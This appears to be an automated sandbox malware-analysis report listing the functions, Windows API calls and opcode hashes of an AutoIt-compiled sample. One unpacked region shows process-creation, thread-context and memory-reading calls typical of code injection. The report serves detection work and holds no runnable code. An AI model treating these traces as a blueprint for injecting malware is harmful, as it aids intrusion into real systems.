Part of subcall function 00C80162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C801A6
Part of subcall function 00C80162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C801B1
Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C801B9
Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C801C1

Part of subcall function 00C760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C6F930), ref: 00C76154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C6F9CD
OleInitialize.OLE32(00000000), ref: 00C6FA4A
CloseHandle.KERNEL32(00000000), ref: 00CA45C8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 7c772a5b59a49833197f9ab5d6843a487aad812a1f30fdbf39f94d2fa8c7f8e8
Instruction ID: 0dd193500c4c7bb75e364dd6b00a2021ef80587afc85c33010c2680ce2588adf
Opcode Fuzzy Hash: 7c772a5b59a49833197f9ab5d6843a487aad812a1f30fdbf39f94d2fa8c7f8e8
Instruction Fuzzy Hash: 7C819EB0905B40CFC7A4EF29F844E29BBE5EBB9316790852AD419CB369E77045878F31

Function 00C6434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C64370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C64415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C64432

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: a610f7dc3b06ac95d68b8eb680caea269b02f494021a825b899d8a1c46a7e2fe
Instruction ID: bb82d3d16b157959b14be2fd8493a4580a6578e374096c5537a4e541da37f6c5
Opcode Fuzzy Hash: a610f7dc3b06ac95d68b8eb680caea269b02f494021a825b899d8a1c46a7e2fe
Instruction Fuzzy Hash: DC318EB0504701CFC735DF24D885A9BBBE8FF58309F00092EE69AC6391E771AA44CB66

Function 00C8571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C85733

Part of subcall function 00C8A16B: __NMSG_WRITE.LIBCMT ref: 00C8A192
Part of subcall function 00C8A16B: __NMSG_WRITE.LIBCMT ref: 00C8A19C

__NMSG_WRITE.LIBCMT ref: 00C8573A

Part of subcall function 00C8A1C8: GetModuleFileNameW.KERNEL32(00000000,00D233BA,00000104,?,00000001,00000000), ref: 00C8A25A
Part of subcall function 00C8A1C8: ___crtMessageBoxW.LIBCMT ref: 00C8A308

Part of subcall function 00C8309F: ___crtCorExitProcess.LIBCMT ref: 00C830A5
Part of subcall function 00C8309F: ExitProcess.KERNEL32 ref: 00C830AE

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5b86a408888c8e3d70c29d91ff2ac483d348f72415e3c6c38090d95788c736de
Instruction ID: 7a00250a91698fc75bd70341144d0c871e8c2dc2376d8afea5036bc50778cd8e
Opcode Fuzzy Hash: 5b86a408888c8e3d70c29d91ff2ac483d348f72415e3c6c38090d95788c736de
Instruction Fuzzy Hash: 8A01D235310B11DBE6213735AC82B2E73488F92769F50443AF515DA291DFB49D01576C

Function 00CC98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CC9548,?,?,?,?,?,00000004), ref: 00CC98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CC9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CC98D1
CloseHandle.KERNEL32(00000000,?,00CC9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CC98D8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ac193f67eafb7563bb267006d423a5208bd8303a430f90d539784b8b218546d1
Instruction ID: 2df8867749d899f1577a461858cf53c7e60988996fa5be33928619df9eb74824
Opcode Fuzzy Hash: ac193f67eafb7563bb267006d423a5208bd8303a430f90d539784b8b218546d1
Instruction Fuzzy Hash: 33E08632140218B7EB211B54EC4AFDE7B19EB06761F108124FB246D0F087B116129798

Function 00CC8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC8D1B

Part of subcall function 00C82D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C89A24), ref: 00C82D69
Part of subcall function 00C82D55: GetLastError.KERNEL32(00000000,?,00C89A24), ref: 00C82D7B

_free.LIBCMT ref: 00CC8D2C
_free.LIBCMT ref: 00CC8D3E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 417801a4e3490775b197480215d501554a87f86d7070c6b70e043e3f5823f950
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 00E017B1601A0246CB24B6B8EA48F9327EC4F98356B14091EF52ED7186CE64FD86D328

Function 00C6A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C9FC01

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 65495250f1198f6e67bd0caa6a226c97fb9e7a6bf8a318b0bd6efd9778c6a418
Instruction ID: 65a7cc93f0ad3035b139d157dd5ef54406067a156bb74ca798fcaf0a19eb07a5
Opcode Fuzzy Hash: 65495250f1198f6e67bd0caa6a226c97fb9e7a6bf8a318b0bd6efd9778c6a418
Instruction Fuzzy Hash: 02224570508301DFCB24DF14C494A6ABBE1BF85304F24896DE99A9B362D736ED85DF82

Function 00C64C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C64CBA

Strings

EA06, xrefs: 00C9D8CC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 0963407d1219b9c715ab7b34b6660aca03c5bd3e0397299a121961bac0861328
Instruction ID: a764642b03013cf7888109d232f541b9c54f8a04fbd4f7f1c170d6d2d89aea5a
Opcode Fuzzy Hash: 0963407d1219b9c715ab7b34b6660aca03c5bd3e0397299a121961bac0861328
Instruction Fuzzy Hash: 8D417D31E041586BCF399B64CCE17BF7FA2DB46300F284475ED86EB282D6319E4493A1

Function 00C67A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C67AAB
_memmove.LIBCMT ref: 00C67B16

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction ID: cf33e8b245f5484974385f862bb0f788b45414bda0d73518e536db10409b523b
Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction Fuzzy Hash: 7F31C8B1604606AFC714DF68C8D1D69F3A9FF48314B158B29E529CB391EB30ED50DB90

Function 00C647D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C64834

Part of subcall function 00C8336C: __lock.LIBCMT ref: 00C83372
Part of subcall function 00C8336C: DecodePointer.KERNEL32(00000001,?,00C64849,00CB7C74), ref: 00C8337E
Part of subcall function 00C8336C: EncodePointer.KERNEL32(?,?,00C64849,00CB7C74), ref: 00C83389

Part of subcall function 00C648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C64915
Part of subcall function 00C648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C6492A

Part of subcall function 00C63B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C63B68
Part of subcall function 00C63B3A: IsDebuggerPresent.KERNEL32 ref: 00C63B7A
Part of subcall function 00C63B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D252F8,00D252E0,?,?), ref: 00C63BEB
Part of subcall function 00C63B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C63C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C64874

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 5258e309804ea9c41fe02f3520d8e9da71e5690e756044b1a62a522f246983fb
Instruction ID: 564e8decc7656eedf4f7d4c077ed0f51fbd64dd376f57eb2e1df265a68c7a7df
Opcode Fuzzy Hash: 5258e309804ea9c41fe02f3520d8e9da71e5690e756044b1a62a522f246983fb
Instruction Fuzzy Hash: 58118C71908341DBD720EF69EC8591EBBE8EFA8750F10451EF480C72B1DB709A46CBA6

Function 00C80DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8571C: __FF_MSGBANNER.LIBCMT ref: 00C85733
Part of subcall function 00C8571C: __NMSG_WRITE.LIBCMT ref: 00C8573A
Part of subcall function 00C8571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F

std::exception::exception.LIBCMT ref: 00C80DEC
__CxxThrowException@8.LIBCMT ref: 00C80E01

Part of subcall function 00C8859B: RaiseException.KERNEL32(?,?,?,00D19E78,00000000,?,?,?,?,00C80E06,?,00D19E78,?,00000001), ref: 00C885F0

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 00e019e3ad042aeca6467c9650b0373103a0a56e16343e3b5da84107250be987
Instruction ID: bf30ae0d4ca0e44f437bf858e446e7408c15949788e9fb053929bf1e833413a6
Opcode Fuzzy Hash: 00e019e3ad042aeca6467c9650b0373103a0a56e16343e3b5da84107250be987
Instruction Fuzzy Hash: DEF0A47150021E66DB10BAA4EC119EFBBAC9F01359F20442AFD1496691DFB09A88E3DA

Function 00C853A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

__lock_file.LIBCMT ref: 00C853EB

Part of subcall function 00C86C11: __lock.LIBCMT ref: 00C86C34

__fclose_nolock.LIBCMT ref: 00C853F6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 11192cb707e96e3cafa1d11a2ec55de36c436b8e60396fc340cba529516eab7a
Instruction ID: 1e9521df2d8a1cbfe2d8a496a84a2d2226b6dc51677558b9e3edff0541eb2029
Opcode Fuzzy Hash: 11192cb707e96e3cafa1d11a2ec55de36c436b8e60396fc340cba529516eab7a
Instruction Fuzzy Hash: 20F0B471901A049ADB21BF759C027AE77E06F4137DF608209E424AB5D1CFFC8A45BB5E

Function 010144AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01014C6B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01014D01
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01014D23

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: 726afc8c14c464b43dc39c7b331e471ca8bc16a362d5c035f64c91f5aa2b6a61
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: B612CD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A

Function 00C80C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C80CB7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a71cdecc6b5476ee6599335bfe42894ccb7f1cd48810b4288e4e22d7ca6ac7c0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C531E370A001059FC798EF09C494969FBA6FB49304F3486A5E81ACB351D631EEC5DB8A

Function 00C9FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C9FCB7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 90849d4881ed5c9842a979fb467b9298f43356968b73cd746d501088dc9b012f
Instruction ID: 1cd6f88ce9306e96b3cd7eae4ebadc044cb81917c62e59fdbbae20155f88b044
Opcode Fuzzy Hash: 90849d4881ed5c9842a979fb467b9298f43356968b73cd746d501088dc9b012f
Instruction Fuzzy Hash: F64106746043519FDB24DF24C498B1ABBE0BF45318F1988ACE89A9B362C732ED45CF52

Function 00C67B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C67BB3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7e6ffd44b182eab9622c97f95b36c3bd1536456da4f9b4a3d7fb65348dcdf88f
Instruction ID: 93e28eca3806e64bd8c6cefc079f162ab9cdddc391f7be8224e8b3fd03c98fb1
Opcode Fuzzy Hash: 7e6ffd44b182eab9622c97f95b36c3bd1536456da4f9b4a3d7fb65348dcdf88f
Instruction Fuzzy Hash: 1F213672604B18FBDF209F16F8856AA7BB4FB64354F20892EF486C5190EF3085D0D755

Function 00C64DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C64BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C64BEF

Part of subcall function 00C8525B: __wfsopen.LIBCMT ref: 00C85266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E0F

Part of subcall function 00C64B6A: FreeLibrary.KERNEL32(00000000), ref: 00C64BA4

Part of subcall function 00C64C70: _memmove.LIBCMT ref: 00C64CBA

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d7881357865c755426b298462f249475aa59021f19b5c774e6d17856e30cedf2
Instruction ID: ec01d35299efca61700bad419f3cf6172661111f572e9923c3b12bbad69f4382
Opcode Fuzzy Hash: d7881357865c755426b298462f249475aa59021f19b5c774e6d17856e30cedf2
Instruction Fuzzy Hash: C511E731600205ABCF28BF70C896FADB7A4AF84710F10882DF552AB1C1DF719A01AB91

Function 00C9FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C9FD91

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c28600184faef27da73800b147701abf51ca1d3a4352017eae838f68540781f7
Instruction ID: 495c1af57d894e5baa8df53c2126134441fa1a7751a3908d1dfe19ded623012f
Opcode Fuzzy Hash: c28600184faef27da73800b147701abf51ca1d3a4352017eae838f68540781f7
Instruction Fuzzy Hash: 6E2113B4508341DFCB24DF64C484A1ABBE0BF88318F15896CF89A97762D731E809DF92

Function 00C84863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C848A6

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 4642fbcd9a7bb6191cf85b5624b5bea3120bc83bb2bc76873b779db0dd9057dc
Instruction ID: 2ab6b83770572b89db1b18128961dd064f6ff20cb54ce704fa62e1e595049cc4
Opcode Fuzzy Hash: 4642fbcd9a7bb6191cf85b5624b5bea3120bc83bb2bc76873b779db0dd9057dc
Instruction Fuzzy Hash: B4F0C23190060AEBDF15BFB48C067EE7AA1AF0032DF558414F424DA1D2CB78CA55EF59

